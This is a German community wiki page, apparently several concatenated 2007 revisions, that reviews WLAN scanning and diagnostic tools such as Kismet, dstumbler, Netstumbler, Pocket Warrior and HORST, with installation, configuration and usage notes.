Hier können die IP Adressen angegeben werden, denen es erlaubt ist sich zur Drone zu connecten. Es sind auch IP-Ranges möglich.

'''bindaddress='''
Adresse an der die Drone lauscht, dies ist interessant, falls man mehrere Interfaces hat und nur auf einer bestimmten IP/Interface horchen will.
defaultmäßg bindet sich die Drone an alle IP-Adressen.

'''Dronen/Server'''

Auf dem Server, der die Daten der Drone anzeigen soll einfach in der kismet.conf source=kismet_drone,ip_der_drone:port,name eintragen.

=== Screenshots ===

Hier das Hauptfenster von Kismet und als Beispiel das packetgraph PopUp-Fenster.

{| style="right; background:transparent; padding:0px; margin:0px; subst:Absatz"
|[[Bild:Kismet_main.png|thumb|Bild1: Hauptansicht von Kismet]]
|[[Bild:kismet_graph.png|thumb|Bild2: Das packetgraph popup von Kismet]]
|}

= BSD-Airtools =

Allgemeine Hinweise zu dieser Tool-Sammlung unter [http://www.dachb0den.com/projects/bsd-airtools.html].

'''Betriebssystem''': *BSD, (theoretisch auch Mac OS X)

'''Typ/Umgebung''': Konsolenanwendung/wi-Treiber-Patches

=== Allgemeine Beschreibung ===

Die BSD-Airtools sind eine Sammlung von Programmen zum Auffinden
(dstumbler), sowie Aufnehmen (prism2dump, dwepdump) von
WLAN-Netzwerkverkehr. Weiters ist ein Werkzeug zur Steuerung von
Prism2/Orinoco-kompatibler Hardware (prism2ctl) und ein Programm zum
Auffinden von WEP-Schlüsseln (dwepcrack) sowie zur Generierung selbiger dabei
(dwepkeygen). Um mehr Informationen auslesen zu können haben die
Entwickler noch Patches für den bestehenden WLAN-Treiber (wi)
geschrieben. Die gesamte Suite ist für die Nutzung mit diesem Treiber
ausgelegt (Prism2/Orinoco; siehe Manpage wi) und ist z.B. mit
Atheros-basierten Geräten nur eingeschränkt nutzbar.

Da es hier hauptsächlich um Scan-Tools geht, wird hier dstumbler näher
betrachtet.

=== Installation ===

Die Installation wird wie üblich unter *BSD mit der Ports-Collection
vorgenommen. (oder z.B. pkg_add -r bsd-airtools)

Im Ports-Tree:

cd /usr/ports/net-mgmt/bsd-airtools
make && sudo make install && make clean

unter *BSD reicht für eine Paket-Installation (falls das
fertige Paket zur Verfügung steht) meistens auch

pkg_add -r bsd-airtools

dazu am besten die jeweiligen Ports-Collection-Howtos heranziehen:

FreeBSD [http://www.freebsd.org/doc/de_DE.ISO8859-1/books/handbook/ports.html]
OpenBSD [http://www.openbsd.org/ports.html]
NetBSD [http://www.netbsd.org/Documentation/pkgsrc/]

== dstumbler ==

[[Bild:dstumbler1.png|thumb|dstumbler mit AP-Anzeige]]
[[Bild:dstumbler2.png|thumb|dstumbler mit Node-Anzeige]]

'''Kommandozeilenparameter'''

usage: dstumbler <device> [-d] [-osn] [-m <int>] [-g <gps device>] [-l <logfile>]
-d: run dstumbler without specifying a wireless device
-o: specify the use of prism2 card in monitor mode
-s: disable scan mode on the card, instead do old style stat polling
-n: use basic ascii characters for limited terminal fonts
-m: randomly set mac address at specified interval or 0 for startup
-g: specify gps device to use. or host:port for gpsd
-l: specify logfile to use for realtime logging

'''Ausführung'''

Zur Ausführung reicht auf entsprechender Hardware meist

sudo ifconfig <device> promisc monitor up
sudo dstumbler <device>

'''Bedienung'''

[+/-] Access-Point-Auswahl
[</>] Node-Auswahl
[u/d] seitenweise vor/zurück
[e/h] Anfang/Ende
[n/s] newest/sort
[a] Autoselect
[r] Hardware-Hersteller per MAC-Addresse auflösen
[o] Clients/Nodes anzeigen
[i] Audio Ausgabe (de-)aktivieren
[m] Menü/Hilfe ein-/ausschalten
[k] Neu zeichnen des Interface
[c] Channel auswählen
[.] Kommentar einfügen
[l] Zuvor gespeicherte Daten einlesen
[b] gesammelte Daten abspeichern
[q] Programm beenden

'''Verwendete Symbole zur Kennzeichnung'''

'''Access-Point-Liste'''

'>' aktuell ausgewählter Access-Point
'*' neuer Access-Point
'4' 40-Bit Verschlüsselung
'w' WEP-Verschlüsselung
'n' keine WEP-Verschlüsselung
'a' Ad-Hoc-Modus
'b' BSS
'k' keyed
'o' Open-Modus
'd' Access-Point benutzt die Default-SSID

'''Node-Liste'''

'>' aktuell ausgewählter Node
'*' neu hinzugekommener Node
'w' WEP-Verschlüsselung
'n' keine WEP-Verschlüsselung
'a' Ad-Hoc-Modus
'b' BSS
'k' keyed
'o' open
'a' any
's' set

=== Screenshots ===

weitere Screenshots befinden sich unter [http://www.dachb0den.com/projects/dstumbler.html]

== dweputils ==

Infos unter [http://www.dachb0den.com/projects/dweputils.html]

== prism2ctl ==

Infos unter [http://www.dachb0den.com/projects/prism2ctl.html]

== prism2dump ==

http://www.dachb0den.com/projects/prism2dump.html

= Pocket Warrior =

'''Betriebssystem:''' Windows PocketPC 2002; geeignet für PDAs mit ARM Prozessor und Prism WiFi.

'''Typ/Umgebung:''' PDA Applikation

'''Allgemeine Beschreibung:'''
Das Programm Pocketwarrior [http://pocketwarrior.sourceforge.net/index.html] ermöglicht es, mittels PDA unterwegs nach Wlans zu suchen. Dabei werden Informationen wie SSID, BSSID sowie Signalstärke und dergleichen angezeigt. Bei angeschlossenem GPS-Empfänger wird bei jedem gefundenen Knoten zusätzlich zur Uhrzeit auch die exakte Position gepeichert.

Die Bedienung ist sehr einfach: Nach Start des Programms klickt man auf den grünen Punkt im unteren Displaybereich und startet somit den Scan; der Punkt wird zu einem roten Quadrat. Zum Stoppen des Scans betätigt man ebendieses. Jedes gefundene Netzwerk wird mit einem (abschaltbaren) Signalton quittiert. Dabei erscheinen in der Spalte BSSID verschiedene Icons, die über Art des Funknetzwerkes informieren. Drei grüne Punkte symbolisieren ein Ad-Hoc Netzwerk (so zum Beispiel einen Funkfeuer-Knoten), eine schwarze, gelbe, grüne oder rote Scheibe geben Auskunft über die Signalstärke. Wird in dieser Scheibe ein "W" angezeigt, so bedeutet dies, dass es sich beim vorliegenden Netzwerk um eines mit Verschlüsselung handelt. Welche Verschlüsselung eingesetzt wird, kann das Programm nicht erkennen.

Nach erfolgtem Scannen kann die im Programm dargestellte Tabelle als *.csv Datei exportiert und die erhobenen Daten z.B. mit Excel ausgewertet werden.

=== Screenshots ===

[[Bild:Pocketwarrior_scan_kl.png|Bild1: Pocketwarrior scan]]

Bild: Pocketwarrior im Einsatz

[[Bild:Auswertung.png|Bild2: Daten in Excel]]

Bild: Auswertung der ersnifften Daten mit Excel

= Sniffem =

'''Betriebssystem:''' ab Windows 95

'''Testsystem:''' HP/Compaq TC1100 mit Intel PRO/Wireless BG 2200. Microsoft Windows XP Tablet PC Edition 2005 SP2

=== Allgemeine Beschreibung ===

Sniff'em ist ein Packet-Sniffer zur Aufzeichnung, Analyse und Überwachung von Netzwerkdaten. Die Testversion analysiert nur ausgehenden Netzwerkverkehr.

=== Installation ===

Windows-Installer; Neustart des Systems nach der Installation ist notwendig.

=== Probleme ===

Wird das Programm nicht mit Administratoren-Rechten ausgeführt, erscheint eine Fehlermeldung, die keinen Aufschluss über das Problem gibt.

Wird das Programm mit Administratoren-Rechten ausgeführt, stürzt das Programm nach Capture-> Start mit einem Runtime-Error ab. Das Produkt wird auch gar nicht als spezielles WLAN-Tool verkauft; möglicherweise ist es dafür nicht gedacht bzw. geeignet.

=== Screenshots ===

[[Bild:sniffem.png]]

=== Links ===

http://www.sniff-em.com/sniffem.shtml

= Wild Packets Aero Peek =

'''Betriebssystem:''' Windows XP (SP2), Windows 2000 (SP4)

'''Testsystem:''' HP/Compaq TC1100 mit Intel PRO/Wireless BG 2200. Microsoft Windows XP Tablet PC Edition 2005 SP2

=== Allgemeine Beschreibung ===

Aero Peek analysiert den Netzwerkverkehr in WLANs. Es unterstützt alle gängigen WLAN-Protokolle, WEP, WPA/PSK sowie viele Application-Layer Protokolle. Weiters ist das Produkt mit einem GSM-Empfänger kombinierbar, um Feldstärken und Signal-Rauschabstände kartographieren zu können.

Aero Peek wird in der Versionen NX, SE und VX vertrieben, die sich in ihrem Funktionsumfang unterscheiden.

=== Installation ===

Die AiroPeek Demoversion ist nunmehr enthalten in der OmniPeek Demoversion - es gibt keine eigenständige AiroPeek Demoversion mehr.

Windows-Installer, keine Auffälligkeiten.

=== Probleme ===

Die OmniPeak Software verlangt nach dem Start nach spezieller Hardware (Spectrum Sensors). Anderes WLAN-Equipment wird zwar lt. Hersteller unterstützt, die erforderlichen NDIS Treiber konnten aber im Demo-Package nicht gefunden werden.

Die Software war deshalb nicht bestimmungsgemäß nutzbar.

=== Screenshots ===

[[Image:Omipeek1.png|thumb|OmniPeek - Auswahl der Cardbus-Antenne]]

=== Links ===

http://www.wildpackets.com/products/airopeek/overview

WlanScanTools

2007-04-24T19:15:34Z

Cnagl: Layout angepasst

= Netstumbler =

'''Betriebssystem:''' ab Windows 98; WIN CE: Ministumbler

'''Allgemeine Beschreibung:'''

Netsumbler ist ein WLAN-Scan-Tool für PC/Laptops mit integrierten WLAN bzw. PCMCIA/USB WLAN für Windows (ab Win98, für CE gibt es eine eigene Version den MiniStumbler) mit einigen Besonderheiten wie GPS Markierung und Text-to-Speech-Ausgabe.

=== Installation ===

Download über die Hompage von Netsumbler http://www.netstumbler.com/downloads/ [[Bild:Netstumbler.png]]

Nach dem Doppelklick auf das Item kommst Du zur "License Agreement". [[Bild:Netstumbler2.png]]

Nach sorgfältigem Durchlesen ;-) auf den Button "I Agree" drücken und Du kannst eine Auswahl der Komponenten treffen. [[Bild:Netstumbler3.png]]

Nach dem Drücken des Button "Next", kannst Du noch den Installationspfad festlegen und mit "Close" ist die Installation auch schon abgeschlossen!

[[Bild:Netstumbler4.png]] [[Bild:Netstumbler5.png]]

Danach werden noch die Release Notes angezeigt.

[[Bild:Netstumbler6.png]]

=== Starten und Benutzen von Netstumbler ===

Entweder über Start->Programme->Network Stumbler [[Bild:Netstumbler7.png]] oder über das Desktop Item Network Stumbler. [[Bild:Netstumbler8.png]]

Danach startet das Programm und sucht nach Deiner WLAN-Karte.
Findet es keinen Adapter, weil Du z.B. deine WLAN Karte nicht eingesteckt oder eingeschaltet hast, findest Du im Fuß des Programm-Windows die Nachricht "Adapter not present" [[Bild:Netstumbler9.png]] (Adapter aktivieren Programm schließen und nochmals starten), sonst zeigt Dir das Programm gleich mal alle aktiven Access Points an!

Hinweis:
Grün bedeutet AP ist aktiv
Rot bedeutet unerreichbar, aber unter Windows bei "bevorzugte Netzwerke" definiert
Grau bedeutet AP war aktiv

[[Bild:Netstumbler10.png]]

Auf der rechten Seite kannst Du die anzuzeigenden AP nach unterschiedlichen Eigenschaften filtern!
Wählst Du nun unter dem Menüpunkt Channels oder SSIDs eine MAC Adresse aus, so wird Dir der Empfangslevel angezeigt (Eigentlich wird dir die Signalstärke bezogen zur Noise (-100dbm) angezeigt)!

[[Bild:Netstumbler11.png]]

Über den Menüpunkt View->Options->General lässt sich die Scan Geschwindigkeit einstellen.
Über den Menüpunkt File->Save lässt sich der Scan abspeichern.

=== Links ===

http://www.netstumbler.com

http://de.wikipedia.org/wiki/Netstumbler

= HORST =

'''Betriebssystem:''' läuft direkt auf dem Funkfeuer-Router (Freifunk bzw. Openwrt Firmware)

'''Typ/Umgebung:''' Linux Konsolenapplikation

=== Allgemeine Beschreibung ===

''Horst'' steht für "Horsts OLSR Radio Scanning Tool" und wurde in der Berliner Freifunk Community entwickelt. ''Horst'' kann nützlich sein um die Verbindungsqualität und auch die OLSR-Kommunikation mit anderen Knoten zu analysieren. Um nach OLSR-Paketen zu filtern und übrige Pakete auszublenden kann der OLSR-Filter (Taste 'o') aktiviert werden. So kann man OLSR-Protokollabläufe relativ einfach mitverfolgen - zum Beispiel, ob die RTS/CTS Pakete eines Nachbarknoten auch empfangen werden oder nicht, und somit eine eventuelle Paketkollision dadurch ausschliessen. An interessanten Stellen kann die Paketanzeige mittels Taste 'p' pausiert werden.

''Horst'' zeigt für eine empfangene Station die jeweilige IP-Adresse, SNR (Signal-Noise-Ratio), SOURCE (Source-MAC), BSSID (Basic Service Set IDentifier), LQ (OLSR-LinkQuality), GW (eventuelle Gateway-Eigenschaft), NEIGH (Anzahl der Nachbarschaftsbeziehungen einer Station), OLSR/COUNT (Anzahl der OLSR-Pakete zu Gesamtepaketanzahl zu einer Station) sowie den TSF-Wert (Timer Synchronization Function) an. Im Frame rechts unten wird zusätzlich die SNR in Signal- und Rauschleistung geteilt dargestellt und kann somit bei der Ausrichtung einer Antenne sehr hilfreich sein.

=== Installation und Programmstart ===

Folgende Pakete sind zur Installation von ''Horst'' nötig und entweder mittels 'ipkg install <file.ipk>' oder Webinterface einzuspielen.

http://88.198.196.3/sven-ola/ipkg/packages/libncurses_5.2_mipsel.ipk

http://88.198.196.3/sven-ola/ipkg/packages/horst_1.2.2_mipsel.ipk

Gestartet wird ''Horst'' mittels Kommandozeilenaufruf in der Konsole. Da per Default-Installation die PATH-Variable für ''Horst'' gesetzt ist, reicht ein schlichtes 'horst' als Konsolenaufruf.

=== Interfacefunktionen ===
[p] Pause/Run
[s] Sortierung nach SNR (aktivieren/deaktivieren)
[c] Kontrollpakete (RTS/CTS/ACK/etc.) anzeigen (aktivieren/deaktivieren)
[o] OLSR Pakete filtern (aktivieren/deaktivieren)
[q] beenden

=== Screenshots ===

{| style="float:left; background:transparent; padding:0px; margin:0px;"
| [[Bild:0xff_screenshot_horst_all_2.jpg|left|thumb|Bild1: ungefiltertes Capturing]]
|Bild1: ungefiltertes Capturing (mit Beacons, inkl. Beacons von !OLSR-Knoten zb. hier Station 'chome')
|}

{| style="float:left; background:transparent; padding:0px; margin:0px;"
|[[Bild:0xff_screenshot_horst_olsr_2.jpg|left|thumb|Bild2: OLSR Filter]]
|Bild2: OLSR Filter aktiv (LQ-Messages, HNA-Announces, etc.)
|}

= KISMET =

'''Betriebssystem:''' läuft unter Linux oder als Drone direkt auf dem Funkfeuer-Router (Freifunk bzw. Openwrt Firmware)

'''Typ/Umgebung:''' Linux Konsolenapplikation

=== Einleitung ===

Kismet ist ein Wireless Lan tool, dass als Netzwerk- Finder/Sniffer/Intrusion Detection System Anwendung finden kann.
Es besteht aus einem Server und einem Client der die Daten des Servers graphisch aufbereitet.
Kismet ist sehr umfangreich, und in diesem Wikieintrag kann leider nur an der Oberfläche dessen gekratzt werden, was mit Kismet möglich ist.

=== Installation: ===

'''Source'''

Die Sourcen, dazugehörige Signatur sowie den gpg Key des Kismet Herausgebers kann man sich von http://www.kismetwireless.net/download.shtml herunterladen.

gpg --import dragorn.gpg
importiert den gpg-PublicKey des Kismetherausgebers in den eigenen Schlüsselbund

gpg --verify kismet-2007-01-R1b.tar.gz.asc kismet-2007-01-R1b.tar.gz
überprüfen ob das tar-file das ist, dass der Herausgeber online gestellt hat.

tar xvzf kismet-2007-01-R1b.tar.gz
entpackt das tar-file in das aktuelle Verzeichnis

cd kismet-2007-01-R1b
wechselt in das Verzeichnis kismet-2007-01-R1b

./configure
=> hier darauf achten das keine Fehlermeldungen kommen, eventuell benötigte Libraries nachinstallieren

make

sudo make install (falls nur root Kismet aufrufen sollte)
oder sudo make suidinstall (falls alle Benutzer Kismet aufrufen dürfen,
man sollte jedoch im Hinterkopf behalten, das ein Programm bei dem das Suidbit gesetzt ist ein mögliches Sicherheitsrisiko darstellen kann
(http://de.wikipedia.org/wiki/Setuid))

'''Debian'''

sudo aptitude update
sudo aptitude install kismet

Unter Debian kann Kismet (wenn er über aptitude installiert wird) default mäßig nur als root gestartet werden, da dies auf
einem Mehrbenutzersystem meist als sicherer anzusehen ist => siehe suid.)

'''Gentoo'''

'''SuSe'''

'''Fedora'''

'''Ubuntu'''

'''Wrt54g(Drone)'''

ssh root@ip_deines_routers
ipkg update
ipkg install kismet-drone
cd /etc/kismet/
vi kismet_drone.conf (=> siehe Abschnitt Drone)
cd /usr/bin
wl monitor 1
./kismet_drone
mit STRG C abbrechen
wl monitor 0
fertig

Man sollte auch beachten, dass Kismet und OLSR nicht gemeinsam funktionieren, man wird daher beim Starten der Drone aus dem 0xff Netz geworfen.
Es ist daher von Vorteil, sich über Lan zum Router zu verbinden.

===kismet.conf===

Das Konfigurationsfile für Kismet liegt defaultmäßig im Verzeichniss /etc/Kismet/ und kann mit jedem beliebigen Editor bearbeitet werden.
Die wichtigsten Optionen die hier geändert werden müssen sind:

'''suiduser='''
Hier kann angegeben werden, als welcher Benutzer Kismet später laufen soll, damit diese Option zur Verfügung steht, muss Kismet jeodch mit make suidinstall installiert
worden sein.

'''source= 1,2,3,(4)'''
1= Der Name des Wirelessmodules, dass man am leichtesten unter http://www.kismetwireless.net/documentation.shtml in Erfahrung bringt.
2= Der Name des Wirelessinterfaces, z.B: eth1
3= Der Name für diesen Datenstrom, diese Option ist nur bei mehreren Quellen interessant, und kann auf einen beliebigen Namen gesetzt sein.
4= gänzlich optional, hier kann, falls gewünscht, der default Start Channel angegeben werden (falls channelhopping aktiviert ist) bzw.
falls kein Channelhoping aktiviert ist, kann hier der gewünschte Channel eingestellt werden.

'''channelhop='''
Bei dieser Option kann eingestellt werden ob Kismet regelmäßig durch alle Channels des Wlanspektrums "hüpft" oder ob er nur auf einen Channel bleibt.

'''defaultchannels= '''
hier wird angeraten, nicht die US Channelvorgaben zu benutzen, da in Österreich auch die Channels 11,12,13 in Benutzung sind.

'''logdefault='''
Hier kann angegeben werden wie das logfile heisen soll.
durch das logtemplate werden dann Files vom Format NameDatumFortlaufendeNummer.logtype in /var/log/kismet/ erzeugt.

===Bedienung===

Die Bedienung von Kismet erscheint am Anfang etwas schwierig, nach einer kurzen Eingewöhnungsphase sind diese Bedenken meist vergessen :)
Im Startfenster werden die empfangenen Netzwerke im "Autofit" Modus angezeigt, um diesen Modus zu verlassen "s" drücken, und auswählen nach welchen Kriterien die Netzwerke
jetzt sortiert werden sollten.
Hier eine kurze Auflistung der interessantesten Tasten für Kismet:

"s" um den derzeigigen Gruppierungsmodus umzustellen
"h" zeigt eine Quick Reference für Kismet
"q" mit q verlässt man immer das aktuelle PopUp.
"i" zeigt mehr Informationen über das gewählte Netzwerk.
"c" zeigt eine Liste der clients der Gruppe an.
"r" zeigt einen Packet Rate Graphen des Netzwerkverkehrs an.
"w" zeigt die Warnings für das Netzwerk an.
"p" zeigt die packets an, die gerade über das Netzwerk gehen
"a" zeigt eine allgemeine Statistik der Netzwerke an.
"d" dumpt strings aus dem gerade aktellen Datenstream
"f" zeigt die GPS daten (falls vorhanden)
"g" mit g kann man dem Netzwerk Namen geben
"l" zeigt den Powerlevel der Karte an (falls man eine Karte benutzt)
"m" mit m kann man den Sound auf lautlos stellen/ wieder anstellen

===Drone===

Der Stream der Drone wird an den Server unverschlüsselt übertragen, es ist daher in nicht "vertrauenswürdiger" Umgebung
zu empfehlen den Stream verschlüsselt zu übertragen (z.B: mit ssh tunneln).

Die Kismetdronen wird über das File kisemt_drone.conf in /etc/kismet/ konfiguriert.

Der Großteil der Optionen wurden schon unter dem Punkt kismet.conf erklärt.
Die wichtigsten Dronenspezifischen Optionen hier sind:

'''tcpport='''
Hier kann der Port angegeben werden, an dem die Drone die Daten liefert, es wird empfohlen diesen Port auf einen anderen wie den den des Servers zu setzen, falls beide auf einem System laufen.

'''allowedhosts='''
Hier können die IP Adressen angegeben werden, denen es erlaubt ist sich zur Drone zu connecten. Es sind auch Ip-Ranges möglich

'''bindaddress='''
Adresse an der die Drone lauscht, dies ist interessant, falls man mehrere Interfaces hat, und nur auf einer bestimmten IP/Interface horchen will.
defaultmäßg bindet sich die Drone an alle IPs.

'''Dronen/Server'''

Auf dem Server, der die Daten der Drone anzeigen soll einfach in der kismet.conf source=kismet_drone,ip_der_drone:port,name eintragen.

===Screenshots:===
[[Bild:Kismet_main.png|thumb|Bild1: Hauptansicht von Kismet]]
[[Bild:kismet_graph.png|thumb|Bild2: Das packetgraph popup von Kismet]]

Hier das Hauptfenster von Kismet, und als Beispiel das packetgraph PopUp.

.

=BSD-airtools=

Allgemeine Hinweise zu dieser Tool-Sammlung unter [http://www.dachb0den.com/projects/bsd-airtools.html].

'''Betriebssystem''': *BSD, (theoretisch auch Mac OS X)

'''Typ/Umgebung''': Konsolenanwendung/wi-Treiber-Patches

===Allgemeines===

Die BSD-Airtools sind eine Sammlung von Programmen zum Auffinden
(dstumbler), sowie Aufnehmen (prism2dump, dwepdump) von
WLAN-Netzwerkverkehr. Weiters ist ein Werkzeug zur Steuerung von
Prism2/Orinoco-kompatibler Hardware (prism2ctl) und ein Programm zum
Auffinden von WEP-Schlüsseln (dwepcrack) und zur Generierung selbiger dabei
(dwepkeygen). Um mehr Informationen auslesen zu können haben die
Entwickler noch Patches für den bestehenden WLAN-Treiber (wi)
geschrieben. Die gesamte Suite ist für die Nutzung mit diesem Treiber
ausgelegt (Prism2/Orinoco; siehe Manpage wi) und ist z.B. mit
Atheros-basierten Geräten nur eingeschränkt nutzbar.

Da es hier hauptsächlich um Scan-Tools geht, wird hier dstumbler näher
betrachtet.

===Installation===

Die Installation wird wie üblich unter *BSD mit der Ports-Collection
vorgenommen. (oder z.B. pkg_add -r bsd-airtools)

Im Ports-Tree:

cd /usr/ports/net-mgmt/bsd-airtools
make && sudo make install && make clean

unter *BSD reicht für eine Paket-Installation (falls das
fertige Paket zur Verfügung steht) meistens auch

pkg_add -r bsd-airtools

dazu am besten die jeweiligen Ports-Collection-Howtos heranziehen:

FreeBSD [http://www.freebsd.org/doc/de_DE.ISO8859-1/books/handbook/ports.html]
OpenBSD [http://www.openbsd.org/ports.html]
NetBSD [http://www.netbsd.org/Documentation/pkgsrc/]

==dstumbler==

[[Bild:dstumbler1.png|thumb|dstumbler mit AP-Anzeige]]
[[Bild:dstumbler2.png|thumb|dstumbler mit Node-Anzeige]]

'''Kommandozeilenparameter'''

usage: dstumbler <device> [-d] [-osn] [-m <int>] [-g <gps device>] [-l <logfile>]
-d: run dstumbler without specifying a wireless device
-o: specify the use of prism2 card in monitor mode
-s: disable scan mode on the card, instead do old style stat polling
-n: use basic ascii characters for limited terminal fonts
-m: randomly set mac address at specified interval or 0 for startup
-g: specify gps device to use. or host:port for gpsd
-l: specify logfile to use for realtime logging

'''Ausführung'''

Zur Ausführung reicht auf entsprechender Hardware meist

sudo ifconfig <device> promisc monitor up
sudo dstumbler <device>

'''Bedienung'''

[+/-] Access-Point-Auswahl
[</>] Node-Auswahl
[u/d] seitenweise vor/zurück
[e/h] Anfang/Ende
[n/s] newest/sort
[a] Autoselect
[r] Hardware-Hersteller per MAC-Addresse auflösen
[o] Clients/Nodes anzeigen
[i] Audio Ausgabe (de-)aktivieren
[m] Menü/Hilfe ein-/ausschalten
[k] Neu zeichnen des Interface
[c] Channel auswählen
[.] Kommentar einfügen
[l] Zuvor gespeicherte Daten einlesen
[b] gesammelte Daten abspeichern
[q] Programm beenden

'''Verwendete Symbole zur Kennzeichnung'''

'''Access-Point-Liste'''

'>' aktuell ausgewählter Access-Point
'*' neuer Access-Point
'4' 40-Bit Verschlüsselung
'w' WEP-Verschlüsselung
'n' keine WEP-Verschlüsselung
'a' Ad-Hoc-Modus
'b' BSS
'k' keyed
'o' Open-Modus
'd' Access-Point benutzt die Default-SSID

'''Node-Liste'''

'>' aktuell ausgewählter Node
'*' neu hinzugekommener Node
'w' WEP-Verschlüsselung
'n' keine WEP-Verschlüsselung
'a' Ad-Hoc-Modus
'b' BSS
'k' keyed
'o' open
'a' any
's' set

===Screenshots===

weitere Screenshots befinden sich unter [http://www.dachb0den.com/projects/dstumbler.html]

==dweputils==

Infos unter [http://www.dachb0den.com/projects/dweputils.html]

==prism2ctl==

Infos unter [http://www.dachb0den.com/projects/prism2ctl.html]

==prism2dump==

http://www.dachb0den.com/projects/prism2dump.html

=Pocket Warrior=

'''Betriebssystem:''' Windows PocketPC 2002; geeignet für PDAs mit ARM Prozessor und Prism WiFi.

'''Typ/Umgebung:''' PDA Applikation

'''Allgemeine Beschreibung:'''
Das Programm Pocketwarrior [http://pocketwarrior.sourceforge.net/index.html] ermöglicht es, mittels PDA unterwegs nach Wlans zu suchen. Dabei werden Informationen wie SSID, BSSID sowie Signalstärke und der gleichen angezeigt. Bei angeschlossenem GPS-Empfänger wird bei jedem gefundenen Knoten zusätzlich zur Uhrzeit auch die exakte Position gepeichert.

Die Bedienung ist sehr einfach: Nach Start des Programms klickt man auf den grünen Punkt im unteren Displaybereich und startet somit den Scan; der Punkt wird zu einem roten Quadrat. Zum Stoppen des Scans betätigt man ebendieses. Jedes gefundene Netzwerk wird mit einem (abschaltbaren) Signalton quittiert. Dabei erscheinen in der Spalte BSSID verschiedene Icons, die über Art des Funknetzwerkes informieren. Drei grüne Punkte symbolisieren ein Ad-Hoc Netzwerk (so zum Beispiel einen Funkfeuer-Knoten), eine schwarze, gelbe, grüne oder rote Scheibe geben Auskunft über die Signalstärke. Wird in dieser Scheibe ein "W" angezeigt, so bedeutet dies, dass es sich beim vorliegenden Netzwerk um eines mit Verschlüsselung handelt. Welche Verschlüsselung eingesetzt wird, kann das Programm nicht erkennen.

Nach erfolgtem Scannen kann die im Programm dargestellte Tabelle als *.csv Datei exportiert und die erhobenen Daten z.B. mit Excel ausgewertet werden.

===Screenshots:===
[[Bild:Pocketwarrior_scan_kl.png|Bild1: Pocketwarrior scan]]

Bild: Pocketwarrior im Einsatz

[[Bild:Auswertung.png|Bild2: Daten in Excel]]

Bild: Auswertung der ersnifften Daten mit Excel

= sniffem =

'''Betriebssystem:''' ab Windows 95

'''Testsystem:''' HP/Compaq TC1100 mit Intel PRO/Wireless BG 2200. Microsoft Windows XP Tablet PC Edition 2005 SP2

=== Allgemeine Beschreibung: ===

sniff'em ist ein Packet-Sniffer zur Aufzeichnung, Analyse und Überwachung von Netzwerkdaten. Die Testversion analysiert nur ausgehenden Netzwerkverkehr.

=== Installation ===

Windows-Installer; Neustart des Systems nach der Installation ist notwendig.

=== Probleme ===

Wird das Programm nicht mit Administratoren-Rechten ausgeführt, erscheint eine Fehlermeldung, die keinen Aufschluss über das Problem gibt.

Wird das Programm mit Administratoren-Rechten ausgeführt, stürzt das Programm nach Capture-> Start mit einem Runtime-Error ab. Das Produkt wird auch gar nicht als spezielles WLAN-Tool verkauft; möglicherweise ist es dafür nicht gedacht bzw. geeignet.

=== Screenshots ===

[[Bild:sniffem.png]]

=== Links ===

http://www.sniff-em.com/sniffem.shtml

= Wild Packets Aero Peek =

'''Betriebssystem:''' Windows XP (SP2), Windows 2000 (SP4)

'''Testsystem:''' HP/Compaq TC1100 mit Intel PRO/Wireless BG 2200. Microsoft Windows XP Tablet PC Edition 2005 SP2

=== Allgemeine Beschreibung: ===

Aero Peek analysiert den Netzwerkverkehr in WLANs. Es unterstützt alle gängigen WLAN-Protokolle, WEP, WPA/PSK sowie viele Application-Layer Protokolle. Weiters ist das Produkt mit einem GSM-Empfänger kombinierbar, um Feldstärken und Signal-Rauschabstände kartographieren zu können.

Aero Peek wird in der Versionen NX, SE und VX vertrieben, die sich in ihrem Funktionsumfang unterscheiden.

=== Installation ===

Die AiroPeek Demoversion ist nunmehr enthalten in der OmniPeek Demoversion - es gibt keine eigenständige AiroPeek Demoversion mehr.

Windows-Installer, keine Auffälligkeiten.

=== Probleme ===

Die OmniPeak Software verlangt nach dem Start nach spezieller Hardware (Spectrum Sensors). Anderes WLAN-Equipment wird zwar lt. Hersteller unterstützt, die erforderlichen NDIS Treiber konnten aber im Demo-Package nicht gefunden werden.

Die Software war deshalb nicht bestimmungsgemäß nutzbar.

=== Screenshots ===

[[Image:Omipeek1.png|thumb|OmniPeek - Auswahl der Cardbus-Antenne]]

=== Links ===

http://www.wildpackets.com/products/airopeek/overview

WlanScanTools

2007-03-30T20:04:27Z

Cnagl: Hinweise zu Typ/Umgebung und Programmstart beigefÃ¼gt;

= HORST =

'''Betriebssystem:''' läuft direkt auf dem Funkfeuer-Router (Freifunk bzw. Openwrt Firmware)

'''Typ/Umgebung:''' Linux Konsolenapplikation

'''Allgemeine Beschreibung:'''

''Horst'' steht für "Horsts OLSR Radio Scanning Tool" und wurde in der Berliner Freifunk Community entwickelt. ''Horst'' kann nützlich sein um die Verbindungsqualität und auch die OLSR-Kommunikation mit anderen Knoten zu analysieren. Um nach OLSR-Paketen zu filtern und übrige Pakete auszublenden kann der OLSR-Filter (Taste 'o') aktiviert werden. So kann man OLSR-Protokollabläufe relativ einfach mitverfolgen - zum Beispiel, ob die RTS/CTS Pakete eines Nachbarknoten auch empfangen werden oder nicht, und somit eine eventuelle Paketkollision dadurch ausschliessen. An interessanten Stellen kann die Paketanzeige mittels Taste 'p' pausiert werden.

''Horst'' zeigt für eine empfangene Station die jeweilige IP-Adresse, SNR (Signal-Noise-Ratio), SOURCE (Source-MAC), BSSID (Basic Service Set IDentifier), LQ (OLSR-LinkQuality), GW (eventuelle Gateway-Eigenschaft), NEIGH (Anzahl der Nachbarschaftsbeziehungen einer Station), OLSR/COUNT (Anzahl der OLSR-Pakete zu Gesamtepaketanzahl zu einer Station) sowie den TSF-Wert (Timer Synchronization Function) an. Im Frame rechts unten wird zusätzlich die SNR in Signal- und Rauschleistung geteilt dargestellt und kann somit bei der Ausrichtung einer Antenne sehr hilfreich sein.

'''Installation und Programmstart'''

Folgende Pakete sind zur Installation von ''Horst'' nötig und entweder mittels 'ipkg install <file.ipk>' oder Webinterface einzuspielen.

http://88.198.196.3/sven-ola/ipkg/packages/libncurses_5.2_mipsel.ipk

http://88.198.196.3/sven-ola/ipkg/packages/horst_1.2.2_mipsel.ipk

Gestartet wird ''Horst'' mittels Kommandozeilenaufruf auf der Konsole. Da per Default-Installation die PATH-Variable für ''Horst'' gesetzt wird, reicht ein schlichtes 'horst' als Konsolenaufruf.

'''Weitere Interfacefunktionen:'''
[p] Pause/Run
[s] Sortierung nach SNR (aktivieren/deaktivieren)
[c] Kontrollpakete (RTS/CTS/ACK/etc.) anzeigen (aktivieren/deaktivieren)
